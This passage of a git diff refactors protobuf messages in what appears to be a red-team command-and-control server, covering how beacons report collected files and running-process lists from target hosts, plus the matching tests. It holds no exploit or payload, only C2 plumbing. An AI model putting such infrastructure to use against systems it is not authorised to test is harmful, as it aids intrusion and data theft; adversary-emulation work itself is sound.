} // Input Validation diff --git a/tavern/internal/c2/api_report_file_test.go b/tavern/internal/c2/api_report_file_test.go index 130666784..92fa123d8 100644 --- a/tavern/internal/c2/api_report_file_test.go +++ b/tavern/internal/c2/api_report_file_test.go @@ -13,6 +13,7 @@ import ( "google.golang.org/protobuf/testing/protocmp" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" ) @@ -85,7 +86,9 @@ func TestReportFile(t *testing.T) { name: "MissingTaskID", reqs: []*c2pb.ReportFileRequest{ { - Path: "/test", + Chunk: &epb.File{ + Path: "/test", + }, }, }, wantCode: codes.InvalidArgument, @@ -103,14 +106,16 @@ func TestReportFile(t *testing.T) { name: "NewFile_Single", reqs: []*c2pb.ReportFileRequest{ { - TaskId: int64(existingTasks[2].ID), - Path: "/new/file", - Owner: "root", - Group: "wheel", - Permissions: "0664", - Size: 999999, - Sha3_256Hash: "I_AM_IGNORED", - Chunk: []byte("death"), + TaskId: int64(existingTasks[2].ID), + Chunk: &epb.File{ + Path: "/new/file", + Owner: "root", + Group: "wheel", + Permissions: "0664", + Size: 999999, + Sha3_256Hash: "I_AM_IGNORED", + Chunk: []byte("death"), + }, }, }, host: existingHosts[0], @@ -134,11 +139,15 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[2].ID), - Path: "/another/new/file", - Chunk: []byte("death"), + Chunk: &epb.File{ + Chunk: []byte("death"), + Path: "/another/new/file", + }, }, { - Chunk: []byte("note"), + Chunk: &epb.File{ + Chunk: []byte("note"), + }, }, }, host: existingHosts[0], @@ -160,8 +169,10 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[2].ID), - Path: "/another/new/file", - Chunk: []byte("replaced"), + Chunk: &epb.File{ + Path: "/another/new/file", + Chunk: []byte("replaced"), + }, }, }, host: existingHosts[0], @@ -183,8 +194,10 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[3].ID), - Path: "/no/other/files", - Chunk: []byte("meow"), + Chunk: &epb.File{ + Path: "/no/other/files", + Chunk: []byte("meow"), + }, }, }, host: existingHosts[1], diff --git a/tavern/internal/c2/api_report_process_list.go b/tavern/internal/c2/api_report_process_list.go index c062377df..049cc592b 100644 --- a/tavern/internal/c2/api_report_process_list.go +++ b/tavern/internal/c2/api_report_process_list.go @@ -15,7 +15,7 @@ func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProces if req.TaskId == 0 { return nil, status.Errorf(codes.InvalidArgument, "must provide task id") } - if len(req.List) < 1 { + if req.List == nil || len(req.List.List) < 1 { return nil, status.Errorf(codes.InvalidArgument, "must provide process list") } @@ -50,8 +50,8 @@ func (srv *Server) ReportProcessList(ctx context.Context, req *c2pb.ReportProces }() // Create Processes - builders := make([]*ent.HostProcessCreate, 0, len(req.List)) - for _, proc := range req.List { + builders := make([]*ent.HostProcessCreate, 0, len(req.List.List)) + for _, proc := range req.List.List { builders = append(builders, txGraph.HostProcess.Create(). SetHostID(host.ID). 
diff --git a/tavern/internal/c2/api_report_process_list_test.go b/tavern/internal/c2/api_report_process_list_test.go index 5f15e2053..bb68d6da7 100644 --- a/tavern/internal/c2/api_report_process_list_test.go +++ b/tavern/internal/c2/api_report_process_list_test.go @@ -12,6 +12,7 @@ import ( "google.golang.org/protobuf/testing/protocmp" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" ) @@ -44,10 +45,12 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, - {Pid: 2321, Name: "/bin/sh", Principal: "root"}, - {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + {Pid: 2321, Name: "/bin/sh", Principal: "root"}, + {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + }, }, }, wantResp: &c2pb.ReportProcessListResponse{}, @@ -61,10 +64,12 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, - {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, - {Pid: 4809, Name: "/usr/bin/nginx", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + {Pid: 4505, Name: "/usr/bin/sshd", Principal: "root"}, + {Pid: 4809, Name: "/usr/bin/nginx", Principal: "root"}, + }, }, }, wantResp: &c2pb.ReportProcessListResponse{}, @@ -77,8 +82,10 @@ func TestReportProcessList(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportProcessListRequest{ - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + }, }, }, wantResp: nil, @@ -90,7 +97,9 @@ func TestReportProcessList(t *testing.T) { task: existingTask, req: &c2pb.ReportProcessListRequest{ TaskId: int64(existingTask.ID), - List: []*c2pb.Process{}, + List: &epb.ProcessList{ + List: []*epb.Process{}, + }, }, wantResp: nil, wantCode: codes.InvalidArgument, @@ -99,8 +108,10 @@ func TestReportProcessList(t *testing.T) { name: "Not_Found", req: &c2pb.ReportProcessListRequest{ TaskId: 99888777776666, - List: []*c2pb.Process{ - {Pid: 1, Name: "systemd", Principal: "root"}, + List: &epb.ProcessList{ + List: []*epb.Process{ + {Pid: 1, Name: "systemd", Principal: "root"}, + }, }, }, wantResp: nil, diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 179a732a8..5d5ef8004 100644 --- a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -10,6 +10,7 @@ import ( timestamp "github.com/golang/protobuf/ptypes/timestamp" protoreflect "google.golang.org/protobuf/reflect/protoreflect" protoimpl "google.golang.org/protobuf/runtime/protoimpl" + epb "realm.pub/tavern/internal/c2/epb" reflect "reflect" sync "sync" ) @@ -76,88 +77,6 @@ func (Host_Platform) EnumDescriptor() ([]byte, []int) { return file_c2_proto_rawDescGZIP(), []int{2, 0} } -type Process_Status int32 - -const ( - Process_STATUS_UNSPECIFIED Process_Status = 0 - Process_STATUS_UNKNOWN Process_Status = 1 - Process_STATUS_IDLE Process_Status = 2 - Process_STATUS_RUN Process_Status = 3 - Process_STATUS_SLEEP Process_Status = 4 - Process_STATUS_STOP Process_Status = 5 - 
Process_STATUS_ZOMBIE Process_Status = 6 - Process_STATUS_TRACING Process_Status = 7 - Process_STATUS_DEAD Process_Status = 8 - Process_STATUS_WAKE_KILL Process_Status = 9 - Process_STATUS_WAKING Process_Status = 10 - Process_STATUS_PARKED Process_Status = 11 - Process_STATUS_LOCK_BLOCKED Process_Status = 12 - Process_STATUS_UNINTERUPTIBLE_DISK_SLEEP Process_Status = 13 -) - -// Enum value maps for Process_Status. -var ( - Process_Status_name = map[int32]string{ - 0: "STATUS_UNSPECIFIED", - 1: "STATUS_UNKNOWN", - 2: "STATUS_IDLE", - 3: "STATUS_RUN", - 4: "STATUS_SLEEP", - 5: "STATUS_STOP", - 6: "STATUS_ZOMBIE", - 7: "STATUS_TRACING", - 8: "STATUS_DEAD", - 9: "STATUS_WAKE_KILL", - 10: "STATUS_WAKING", - 11: "STATUS_PARKED", - 12: "STATUS_LOCK_BLOCKED", - 13: "STATUS_UNINTERUPTIBLE_DISK_SLEEP", - } - Process_Status_value = map[string]int32{ - "STATUS_UNSPECIFIED": 0, - "STATUS_UNKNOWN": 1, - "STATUS_IDLE": 2, - "STATUS_RUN": 3, - "STATUS_SLEEP": 4, - "STATUS_STOP": 5, - "STATUS_ZOMBIE": 6, - "STATUS_TRACING": 7, - "STATUS_DEAD": 8, - "STATUS_WAKE_KILL": 9, - "STATUS_WAKING": 10, - "STATUS_PARKED": 11, - "STATUS_LOCK_BLOCKED": 12, - "STATUS_UNINTERUPTIBLE_DISK_SLEEP": 13, - } -) - -func (x Process_Status) Enum() *Process_Status { - p := new(Process_Status) - *p = x - return p -} - -func (x Process_Status) String() string { - return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) -} - -func (Process_Status) Descriptor() protoreflect.EnumDescriptor { - return file_c2_proto_enumTypes[1].Descriptor() -} - -func (Process_Status) Type() protoreflect.EnumType { - return &file_c2_proto_enumTypes[1] -} - -func (x Process_Status) Number() protoreflect.EnumNumber { - return protoreflect.EnumNumber(x) -} - -// Deprecated: Use Process_Status.Descriptor instead. -func (Process_Status) EnumDescriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{3, 0} -} - // Agent information to identify the type of beacon. type Agent struct { state protoimpl.MessageState @@ -358,135 +277,21 @@ func (x *Host) GetPrimaryIp() string { return "" } -// Process running on the host system. 
-type Process struct { - state protoimpl.MessageState - sizeCache protoimpl.SizeCache - unknownFields protoimpl.UnknownFields - - Pid uint64 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"` - Ppid uint64 `protobuf:"varint,2,opt,name=ppid,proto3" json:"ppid,omitempty"` - Name string `protobuf:"bytes,3,opt,name=name,proto3" json:"name,omitempty"` - Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"` - Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"` - Cmd string `protobuf:"bytes,6,opt,name=cmd,proto3" json:"cmd,omitempty"` - Env string `protobuf:"bytes,7,opt,name=env,proto3" json:"env,omitempty"` - Cwd string `protobuf:"bytes,8,opt,name=cwd,proto3" json:"cwd,omitempty"` - Status Process_Status `protobuf:"varint,9,opt,name=status,proto3,enum=c2.Process_Status" json:"status,omitempty"` -} - -func (x *Process) Reset() { - *x = Process{} - if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[3] - ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) - ms.StoreMessageInfo(mi) - } -} - -func (x *Process) String() string { - return protoimpl.X.MessageStringOf(x) -} - -func (*Process) ProtoMessage() {} - -func (x *Process) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[3] - if protoimpl.UnsafeEnabled && x != nil { - ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) - if ms.LoadMessageInfo() == nil { - ms.StoreMessageInfo(mi) - } - return ms - } - return mi.MessageOf(x) -} - -// Deprecated: Use Process.ProtoReflect.Descriptor instead. -func (*Process) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{3} -} - -func (x *Process) GetPid() uint64 { - if x != nil { - return x.Pid - } - return 0 -} - -func (x *Process) GetPpid() uint64 { - if x != nil { - return x.Ppid - } - return 0 -} - -func (x *Process) GetName() string { - if x != nil { - return x.Name - } - return "" -} - -func (x *Process) GetPrincipal() string { - if x != nil { - return x.Principal - } - return "" -} - -func (x *Process) GetPath() string { - if x != nil { - return x.Path - } - return "" -} - -func (x *Process) GetCmd() string { - if x != nil { - return x.Cmd - } - return "" -} - -func (x *Process) GetEnv() string { - if x != nil { - return x.Env - } - return "" -} - -func (x *Process) GetCwd() string { - if x != nil { - return x.Cwd - } - return "" -} - -func (x *Process) GetStatus() Process_Status { - if x != nil { - return x.Status - } - return Process_STATUS_UNSPECIFIED -} - // Task instructions for the beacon to execute. 
type Task struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - Id int64 `protobuf:"varint,1,opt,name=id,proto3" json:"id,omitempty"` - Eldritch string `protobuf:"bytes,2,opt,name=eldritch,proto3" json:"eldritch,omitempty"` - Parameters map[string]string `protobuf:"bytes,3,rep,name=parameters,proto3" json:"parameters,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` - FileNames []string `protobuf:"bytes,4,rep,name=file_names,json=fileNames,proto3" json:"file_names,omitempty"` - QuestName string `protobuf:"bytes,5,opt,name=quest_name,json=questName,proto3" json:"quest_name,omitempty"` + Id int64 `protobuf:"varint,1,opt,name=id,proto3" json:"id,omitempty"` + Tome *epb.Tome `protobuf:"bytes,2,opt,name=tome,proto3" json:"tome,omitempty"` + QuestName string `protobuf:"bytes,3,opt,name=quest_name,json=questName,proto3" json:"quest_name,omitempty"` } func (x *Task) Reset() { *x = Task{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[4] + mi := &file_c2_proto_msgTypes[3] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -499,7 +304,7 @@ func (x *Task) String() string { func (*Task) ProtoMessage() {} func (x *Task) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[4] + mi := &file_c2_proto_msgTypes[3] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -512,7 +317,7 @@ func (x *Task) ProtoReflect() protoreflect.Message { // Deprecated: Use Task.ProtoReflect.Descriptor instead. func (*Task) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{4} + return file_c2_proto_rawDescGZIP(), []int{3} } func (x *Task) GetId() int64 { @@ -522,23 +327,9 @@ func (x *Task) GetId() int64 { return 0 } -func (x *Task) GetEldritch() string { - if x != nil { - return x.Eldritch - } - return "" -} - -func (x *Task) GetParameters() map[string]string { - if x != nil { - return x.Parameters - } - return nil -} - -func (x *Task) GetFileNames() []string { +func (x *Task) GetTome() *epb.Tome { if x != nil { - return x.FileNames + return x.Tome } return nil } @@ -562,7 +353,7 @@ type TaskError struct { func (x *TaskError) Reset() { *x = TaskError{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[5] + mi := &file_c2_proto_msgTypes[4] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -575,7 +366,7 @@ func (x *TaskError) String() string { func (*TaskError) ProtoMessage() {} func (x *TaskError) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[5] + mi := &file_c2_proto_msgTypes[4] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -588,7 +379,7 @@ func (x *TaskError) ProtoReflect() protoreflect.Message { // Deprecated: Use TaskError.ProtoReflect.Descriptor instead. 
func (*TaskError) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{5} + return file_c2_proto_rawDescGZIP(), []int{4} } func (x *TaskError) GetMsg() string { @@ -616,7 +407,7 @@ type TaskOutput struct { func (x *TaskOutput) Reset() { *x = TaskOutput{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[6] + mi := &file_c2_proto_msgTypes[5] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -629,7 +420,7 @@ func (x *TaskOutput) String() string { func (*TaskOutput) ProtoMessage() {} func (x *TaskOutput) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[6] + mi := &file_c2_proto_msgTypes[5] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -642,7 +433,7 @@ func (x *TaskOutput) ProtoReflect() protoreflect.Message { // Deprecated: Use TaskOutput.ProtoReflect.Descriptor instead. func (*TaskOutput) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{6} + return file_c2_proto_rawDescGZIP(), []int{5} } func (x *TaskOutput) GetId() int64 { @@ -692,7 +483,7 @@ type ClaimTasksRequest struct { func (x *ClaimTasksRequest) Reset() { *x = ClaimTasksRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[7] + mi := &file_c2_proto_msgTypes[6] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -705,7 +496,7 @@ func (x *ClaimTasksRequest) String() string { func (*ClaimTasksRequest) ProtoMessage() {} func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[7] + mi := &file_c2_proto_msgTypes[6] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -718,7 +509,7 @@ func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksRequest.ProtoReflect.Descriptor instead. func (*ClaimTasksRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{7} + return file_c2_proto_rawDescGZIP(), []int{6} } func (x *ClaimTasksRequest) GetBeacon() *Beacon { @@ -739,7 +530,7 @@ type ClaimTasksResponse struct { func (x *ClaimTasksResponse) Reset() { *x = ClaimTasksResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[8] + mi := &file_c2_proto_msgTypes[7] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -752,7 +543,7 @@ func (x *ClaimTasksResponse) String() string { func (*ClaimTasksResponse) ProtoMessage() {} func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[8] + mi := &file_c2_proto_msgTypes[7] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -765,7 +556,7 @@ func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksResponse.ProtoReflect.Descriptor instead. 
func (*ClaimTasksResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{8} + return file_c2_proto_rawDescGZIP(), []int{7} } func (x *ClaimTasksResponse) GetTasks() []*Task { @@ -786,7 +577,7 @@ type DownloadFileRequest struct { func (x *DownloadFileRequest) Reset() { *x = DownloadFileRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[8] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -799,7 +590,7 @@ func (x *DownloadFileRequest) String() string { func (*DownloadFileRequest) ProtoMessage() {} func (x *DownloadFileRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[8] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -812,7 +603,7 @@ func (x *DownloadFileRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use DownloadFileRequest.ProtoReflect.Descriptor instead. func (*DownloadFileRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{9} + return file_c2_proto_rawDescGZIP(), []int{8} } func (x *DownloadFileRequest) GetName() string { @@ -833,7 +624,7 @@ type DownloadFileResponse struct { func (x *DownloadFileResponse) Reset() { *x = DownloadFileResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[9] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -846,7 +637,7 @@ func (x *DownloadFileResponse) String() string { func (*DownloadFileResponse) ProtoMessage() {} func (x *DownloadFileResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[9] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -859,7 +650,7 @@ func (x *DownloadFileResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use DownloadFileResponse.ProtoReflect.Descriptor instead. 
func (*DownloadFileResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{10} + return file_c2_proto_rawDescGZIP(), []int{9} } func (x *DownloadFileResponse) GetChunk() []byte { @@ -874,20 +665,14 @@ type ReportFileRequest struct { sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` - Path string `protobuf:"bytes,2,opt,name=path,proto3" json:"path,omitempty"` - Owner string `protobuf:"bytes,3,opt,name=owner,proto3" json:"owner,omitempty"` - Group string `protobuf:"bytes,4,opt,name=group,proto3" json:"group,omitempty"` - Permissions string `protobuf:"bytes,5,opt,name=permissions,proto3" json:"permissions,omitempty"` - Size int64 `protobuf:"varint,6,opt,name=size,proto3" json:"size,omitempty"` - Sha3_256Hash string `protobuf:"bytes,7,opt,name=sha3_256_hash,json=sha3256Hash,proto3" json:"sha3_256_hash,omitempty"` - Chunk []byte `protobuf:"bytes,8,opt,name=chunk,proto3" json:"chunk,omitempty"` + TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + Chunk *epb.File `protobuf:"bytes,2,opt,name=chunk,proto3" json:"chunk,omitempty"` } func (x *ReportFileRequest) Reset() { *x = ReportFileRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[10] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -900,7 +685,7 @@ func (x *ReportFileRequest) String() string { func (*ReportFileRequest) ProtoMessage() {} func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[10] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -913,7 +698,7 @@ func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileRequest.ProtoReflect.Descriptor instead. 
func (*ReportFileRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{11} + return file_c2_proto_rawDescGZIP(), []int{10} } func (x *ReportFileRequest) GetTaskId() int64 { @@ -923,49 +708,7 @@ func (x *ReportFileRequest) GetTaskId() int64 { return 0 } -func (x *ReportFileRequest) GetPath() string { - if x != nil { - return x.Path - } - return "" -} - -func (x *ReportFileRequest) GetOwner() string { - if x != nil { - return x.Owner - } - return "" -} - -func (x *ReportFileRequest) GetGroup() string { - if x != nil { - return x.Group - } - return "" -} - -func (x *ReportFileRequest) GetPermissions() string { - if x != nil { - return x.Permissions - } - return "" -} - -func (x *ReportFileRequest) GetSize() int64 { - if x != nil { - return x.Size - } - return 0 -} - -func (x *ReportFileRequest) GetSha3_256Hash() string { - if x != nil { - return x.Sha3_256Hash - } - return "" -} - -func (x *ReportFileRequest) GetChunk() []byte { +func (x *ReportFileRequest) GetChunk() *epb.File { if x != nil { return x.Chunk } @@ -981,7 +724,7 @@ type ReportFileResponse struct { func (x *ReportFileResponse) Reset() { *x = ReportFileResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[11] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -994,7 +737,7 @@ func (x *ReportFileResponse) String() string { func (*ReportFileResponse) ProtoMessage() {} func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[11] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1007,7 +750,7 @@ func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileResponse.ProtoReflect.Descriptor instead. func (*ReportFileResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{12} + return file_c2_proto_rawDescGZIP(), []int{11} } type ReportProcessListRequest struct { @@ -1015,14 +758,14 @@ type ReportProcessListRequest struct { sizeCache protoimpl.SizeCache unknownFields protoimpl.UnknownFields - List []*Process `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` - TaskId int64 `protobuf:"varint,2,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + TaskId int64 `protobuf:"varint,1,opt,name=task_id,json=taskId,proto3" json:"task_id,omitempty"` + List *epb.ProcessList `protobuf:"bytes,2,opt,name=list,proto3" json:"list,omitempty"` } func (x *ReportProcessListRequest) Reset() { *x = ReportProcessListRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[12] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1035,7 +778,7 @@ func (x *ReportProcessListRequest) String() string { func (*ReportProcessListRequest) ProtoMessage() {} func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[12] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1048,21 +791,21 @@ func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListRequest.ProtoReflect.Descriptor instead. 
func (*ReportProcessListRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{13} + return file_c2_proto_rawDescGZIP(), []int{12} } -func (x *ReportProcessListRequest) GetList() []*Process { +func (x *ReportProcessListRequest) GetTaskId() int64 { if x != nil { - return x.List + return x.TaskId } - return nil + return 0 } -func (x *ReportProcessListRequest) GetTaskId() int64 { +func (x *ReportProcessListRequest) GetList() *epb.ProcessList { if x != nil { - return x.TaskId + return x.List } - return 0 + return nil } type ReportProcessListResponse struct { @@ -1074,7 +817,7 @@ type ReportProcessListResponse struct { func (x *ReportProcessListResponse) Reset() { *x = ReportProcessListResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[13] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1087,7 +830,7 @@ func (x *ReportProcessListResponse) String() string { func (*ReportProcessListResponse) ProtoMessage() {} func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[13] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1100,7 +843,7 @@ func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListResponse.ProtoReflect.Descriptor instead. func (*ReportProcessListResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{14} + return file_c2_proto_rawDescGZIP(), []int{13} } type ReportTaskOutputRequest struct { @@ -1114,7 +857,7 @@ type ReportTaskOutputRequest struct { func (x *ReportTaskOutputRequest) Reset() { *x = ReportTaskOutputRequest{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[14] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1127,7 +870,7 @@ func (x *ReportTaskOutputRequest) String() string { func (*ReportTaskOutputRequest) ProtoMessage() {} func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[14] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1140,7 +883,7 @@ func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportTaskOutputRequest.ProtoReflect.Descriptor instead. 
func (*ReportTaskOutputRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{15} + return file_c2_proto_rawDescGZIP(), []int{14} } func (x *ReportTaskOutputRequest) GetOutput() *TaskOutput { @@ -1159,7 +902,7 @@ type ReportTaskOutputResponse struct { func (x *ReportTaskOutputResponse) Reset() { *x = ReportTaskOutputResponse{} if protoimpl.UnsafeEnabled { - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[15] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1172,7 +915,7 @@ func (x *ReportTaskOutputResponse) String() string { func (*ReportTaskOutputResponse) ProtoMessage() {} func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[15] if protoimpl.UnsafeEnabled && x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1185,7 +928,7 @@ func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportTaskOutputResponse.ProtoReflect.Descriptor instead. 